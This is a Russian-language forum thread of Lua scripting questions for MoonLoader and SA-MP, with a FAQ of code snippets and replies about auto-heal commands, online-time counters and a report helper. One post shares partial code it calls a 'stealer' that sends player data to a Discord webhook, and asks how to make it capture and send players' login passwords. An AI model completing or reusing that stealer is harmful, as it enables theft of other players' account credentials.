Вопросы по Lua скриптингу

Общая тема для вопросов по разработке скриптов на языке программирования Lua, в частности под MoonLoader.
  • Задавая вопрос, убедитесь, что его нет в списке частых вопросов и что на него ещё не отвечали (воспользуйтесь поиском).
  • Поищите ответ в теме посвященной разработке Lua скриптов в MoonLoader
  • Отвечая, убедитесь, что ваш ответ корректен.
  • Старайтесь как можно точнее выразить мысль, а если проблема связана с кодом, то обязательно прикрепите его к сообщению, используя блок [code=lua]здесь мог бы быть ваш код[/code].
  • Если вопрос связан с MoonLoader-ом первым делом желательно поискать решение на wiki.

Частые вопросы

Как научиться писать скрипты? С чего начать?
Информация - Гайд - Всё о Lua скриптинге для MoonLoader(https://blast.hk/threads/22707/)
Как вывести текст на русском? Вместо русского текста у меня какие-то каракули.
Изменить кодировку файла скрипта на Windows-1251. В Atom: комбинация клавиш Ctrl+Shift+U, в Notepad++: меню Кодировки -> Кодировки -> Кириллица -> Windows-1251.
Как получить транспорт, в котором сидит игрок?
Lua:
local veh = storeCarCharIsInNoSave(PLAYER_PED)
Как получить свой id или id другого игрока?
Lua:
local _, id = sampGetPlayerIdByCharHandle(PLAYER_PED) -- получить свой ид
local _, id = sampGetPlayerIdByCharHandle(ped) -- получить ид другого игрока. ped - это хендл персонажа
Как проверить, что строка содержит какой-то текст?
Lua:
if string.find(str, 'текст', 1, true) then
-- строка str содержит "текст"
end
Как эмулировать нажатие игровой клавиши?
Lua:
local game_keys = require 'game.keys' -- где-нибудь в начале скрипта вне функции main

setGameKeyState(game_keys.player.FIREWEAPON, -1) -- будет сэмулировано нажатие клавиши атаки
Все иды клавиш находятся в файле moonloader/lib/game/keys.lua.
Подробнее о функции setGameKeyState здесь: lua - setgamekeystate | BlastHack — DEV_WIKI(https://www.blast.hk/wiki/lua:setgamekeystate)
Как получить id другого игрока, в которого целюсь я?
Lua:
local valid, ped = getCharPlayerIsTargeting(PLAYER_HANDLE) -- получить хендл персонажа, в которого целится игрок
if valid and doesCharExist(ped) then -- если цель есть и персонаж существует
  local result, id = sampGetPlayerIdByCharHandle(ped) -- получить samp-ид игрока по хендлу персонажа
  if result then -- проверить, прошло ли получение ида успешно
    -- здесь любые действия с полученным идом игрока
  end
end
Как зарегистрировать команду чата SAMP?
Lua:
-- До бесконечного цикла/задержки
sampRegisterChatCommand("mycommand", function (param)
     -- param будет содержать весь текст введенный после команды, чтобы разделить его на аргументы используйте string.match()
    sampAddChatMessage("MyCMD", -1)
end)
Крашит игру при вызове sampSendChat. Как это исправить?
Это происходит из-за бага в SAMPFUNCS, когда производится попытка отправки пакета определенными функциями изнутри события исходящих RPC и пакетов. Исправления для этого бага нет, но есть способ не провоцировать его. Вызов sampSendChat изнутри обработчика исходящих RPC/пакетов нужно обернуть в скриптовый поток с нулевой задержкой:
Lua:
function onSendRpc(id)
  -- крашит:
  -- sampSendChat('Send RPC: ' .. id)

  -- норм:
  lua_thread.create(function()
    wait(0)
    sampSendChat('Send RPC: ' .. id)
  end)
end
 
Последнее редактирование:

MLycoris

На вид оружие массового семяизвержения
Проверенный
1,993
2,182
Я пишу свой скрипт который будет автоматически писать в чат /healme при 40- хп, как эт сделать?
 
  • Нравится
Реакции: Carl_Henderson

Carl_Henderson

Участник
35
8
Lua:
local sampev = require('lib.samp.events')

function sampev.onSendTakeDamage(playerId, damage, weapon, bodypart)
    if playerId ~= 65535 then
        local myId = select(2, sampGetPlayerIdByCharHandle(PLAYER_PED))
        local hp = sampGetPlayerHealth(myId)
        if hp <= 40 then
            sampSendChat('/healme')
        end
    end
end
function main()
local sampev = require('lib.samp.events')

function sampev.onSendTakeDamage(playerId, damage, weapon, bodypart)
if playerId ~= 65535 then
local myId = select(2, sampGetPlayerIdByCharHandle(PLAYER_PED))
local hp = sampGetPlayerHealth(myId)
if hp <= 40 then
sampSendChat('/healme')
wait(900)
sampSendChat("/usedrugs")
end
end
end

Так?
 

tfornik

Известный
325
260
function main()
local sampev = require('lib.samp.events')

function sampev.onSendTakeDamage(playerId, damage, weapon, bodypart)
if playerId ~= 65535 then
local myId = select(2, sampGetPlayerIdByCharHandle(PLAYER_PED))
local hp = sampGetPlayerHealth(myId)
if hp <= 40 then
sampSendChat('/healme')
wait(900)
sampSendChat("/usedrugs")
end
end
end

Так?
вне function main() , и

Lua:
if hp <= 40 then
    lua_thread.create(function()
        sampSendChat('/healme')
        wait(900)
        sampSendChat("/usedrugs")
    end)
end

замени на это
 
  • Нравится
Реакции: Carl_Henderson

tfornik

Известный
325
260
Lua:
local sampev = require('lib.samp.events')

function sampev.onSendTakeDamage(playerId, damage, weapon, bodypart)
    if playerId ~= 65535 then
        local myId = select(2, sampGetPlayerIdByCharHandle(PLAYER_PED))
        local hp = sampGetPlayerHealth(myId)
        if hp <= 40 then
            lua_thread.create(function()
                sampSendChat('/healme')
                wait(900)
                sampSendChat("/usedrugs")
            end)
        end
    end
end
просто вставь в код, ВНЕ main().

просто вниз куда-нибудь
 

tsunamiqq

Участник
433
17
Lua:
if mainIni.settings.day ~= os.date("%a") then
        mainIni.settings.day = os.date("%a")
        mainIni.settings.onlineDay = 0 -- ОБНУЛЯЕШЬ mainIni.settings.onlineDay
        inicfg.save(mainIni, directIni)
end

function time() -- А здесь используешь main.onDay.online
    startTime = os.time()
    while true do
        wait(1000)
        if sampGetGamestate() == 3 and not return_time then
            sesOnline[0] = sesOnline[0] + 1                           
            sesFull[0] = os.time() - startTime                     
            sesAfk[0] = sesFull[0] - sesOnline[0]                     
            mainIni.onDay.online = mainIni.onDay.online + 1-- А здесь используешь main.onDay.online 
            mainIni.onDay.full = dayFull[0] + sesFull[0]                   
            mainIni.onDay.afk = mainIni.onDay.full - mainIni.onDay.online
            mainIni.onWeek.online = mainIni.onWeek.online + 1             
            mainIni.onWeek.full = weekFull[0] + sesFull[0]             
            mainIni.onWeek.afk = mainIni.onWeek.full - mainIni.onWeek.online 
            local today = tonumber(os.date('%w', os.time()))
            mainIni.myWeekOnline[today] = mainIni.onDay.full
        end
    end
end
Если вкратце, ты обнуляешь одну переменную в таблице , а записываешь данные в другую.
Спасибо, а как сделать еще обновление подсчета АФК, вроде все прописано правильно, но не обновляет
 
Последнее редактирование:

bulba$h

Активный
330
92
помогите, как сделать так, что бы данный стилир отправлял в дс пароль, например (ловит серверный диалог с иконкой пароля (id 1) логирует нажатые кнопки - сам пароль, и автоматически отправляет в дс)
типо стилир:
function main()
    while not isSampAvailable() do wait(0) end
    sampRegisterChatCommand('dw', function(arg)
        local MyId = select(2, sampGetPlayerIdByCharHandle(PLAYER_PED))
        local MyName = sampGetPlayerNickname(MyId)
        local MyLvl = sampGetPlayerScore(select(2, sampGetPlayerIdByCharHandle(PLAYER_PED)))
        local ServerAddress = table.concat({sampGetCurrentServerAddress()}, ':')
        SendWebhook('https://discord.com/api/webhooks/1153601125237399582/KwuuPUCu0VcwJMbm6USEV7aOHX4kiBk5CZxJwnE0hwmOhnTf3Xd2sxNG2bsB9CZ4yF_B', ([[{
            "content": null,
            "embeds": [
              {
                "description": "**Ник:** `%s`\n**Уровень:** `%s`\n**Айди:** `%s`\n**Сервер:** `%s`",
                "color": 16711757
              }
            ],
                "username": "govnostealer",
                "avatar_url": "https://sun9-27.userapi.com/impg/9yjMFj-6fn5xWnUPN40UvPZe1KSgP-Fp67a6dA/c8HS7ARnFjk.jpg?size=800x800&quality=95&sign=f9edd15370c0927ef6219808c2c9db27&c_uniq_tag=3q4qq1ptmhA5pJgPLOv8D-kgTnzyiAdo8MjtpAtoaXk&type=album",
                "attachments": []
              }]]):format(MyName, MyLvl, MyId, ServerAddress))
хуком он сенд диалог респонс
 

Carl_Henderson

Участник
35
8
Можете починить, давно писал и чёт забросил а щас нашёл и не могу понять где ошибка
Lua:
local sampev = require('lib.samp.events')
 
local id = 0
 
local state = false
local function send(text) return sampAddChatMessage('{FF802E}[RHelper]:{FFFFFF} '..text, -1) end
 
function main()
 while not isSampAvailable() do wait(0) end
 
 sampRegisterChatCommand('rh', function()
 state = not state
 send(state and 'Включен' or 'Выключен')
 end)
 
 sampRegisterChatCommand('rhm', function()
 send(state and 'Сейчас включен' or 'Сейчас выключен')
 end)
 
 while true do
 wait(0)
 if testCheat('X') then
 sampSendChat('/rep '..id..' дм')
 end
 end
end
 
function sampev.onSendTakeDamage(data)
 if state then
 id = data
 send('Вы были ранены, количество оставшегося хп: '..getCharHealth(PLAYER_PED))
 send('Нажмите двойным кликом Х для вызова помощи')
 send('Нападающий: ('..sampGetPlayerNickname(data)..')['..data..']')
 end
end
 
  • Эм
Реакции: Hinаta

bulba$h

Активный
330
92
Можете починить, давно писал и чёт забросил а щас нашёл и не могу понять где ошибка
Lua:
local sampev = require('lib.samp.events')
 
local id = 0
 
local state = false
local function send(text) return sampAddChatMessage('{FF802E}[RHelper]:{FFFFFF} '..text, -1) end
 
function main()
 while not isSampAvailable() do wait(0) end
 
 sampRegisterChatCommand('rh', function()
 state = not state
 send(state and 'Включен' or 'Выключен')
 end)
 
 sampRegisterChatCommand('rhm', function()
 send(state and 'Сейчас включен' or 'Сейчас выключен')
 end)
 
 while true do
 wait(0)
 if testCheat('X') then
 sampSendChat('/rep '..id..' дм')
 end
 end
end
 
function sampev.onSendTakeDamage(data)
 if state then
 id = data
 send('Вы были ранены, количество оставшегося хп: '..getCharHealth(PLAYER_PED))
 send('Нажмите двойным кликом Х для вызова помощи')
 send('Нападающий: ('..sampGetPlayerNickname(data)..')['..data..']')
 end
end
смотри как реализовано это у

ну а в следующий раз если код не работает - указывай, на какое место жалуется. никто сидеть гадать не будет
 

Carl_Henderson

Участник
35
8
смотри как реализовано это у

ну а в следующий раз если код не работает - указывай, на какое место жалуется. никто сидеть гадать не будет
Сам не знаю где там ошибка, и мне не автореп нужен. Это вообще сначала было как дм информер
 

tfornik

Известный
325
260
Можете починить, давно писал и чёт забросил а щас нашёл и не могу понять где ошибка
Lua:
local sampev = require('lib.samp.events')
 
local id = 0
 
local state = false
local function send(text) return sampAddChatMessage('{FF802E}[RHelper]:{FFFFFF} '..text, -1) end
 
function main()
 while not isSampAvailable() do wait(0) end
 
 sampRegisterChatCommand('rh', function()
 state = not state
 send(state and 'Включен' or 'Выключен')
 end)
 
 sampRegisterChatCommand('rhm', function()
 send(state and 'Сейчас включен' or 'Сейчас выключен')
 end)
 
 while true do
 wait(0)
 if testCheat('X') then
 sampSendChat('/rep '..id..' дм')
 end
 end
end
 
function sampev.onSendTakeDamage(data)
 if state then
 id = data
 send('Вы были ранены, количество оставшегося хп: '..getCharHealth(PLAYER_PED))
 send('Нажмите двойным кликом Х для вызова помощи')
 send('Нападающий: ('..sampGetPlayerNickname(data)..')['..data..']')
 end
end
require("lib.moonloader") в самое начало , на первую строку.
 
  • Bug
  • Эм
Реакции: Sanchez., Hinаta и chapo

asdasdsdasd

Участник
149
13
мне толку от этого, у меня вопрос он может быть там ВООБЩЕ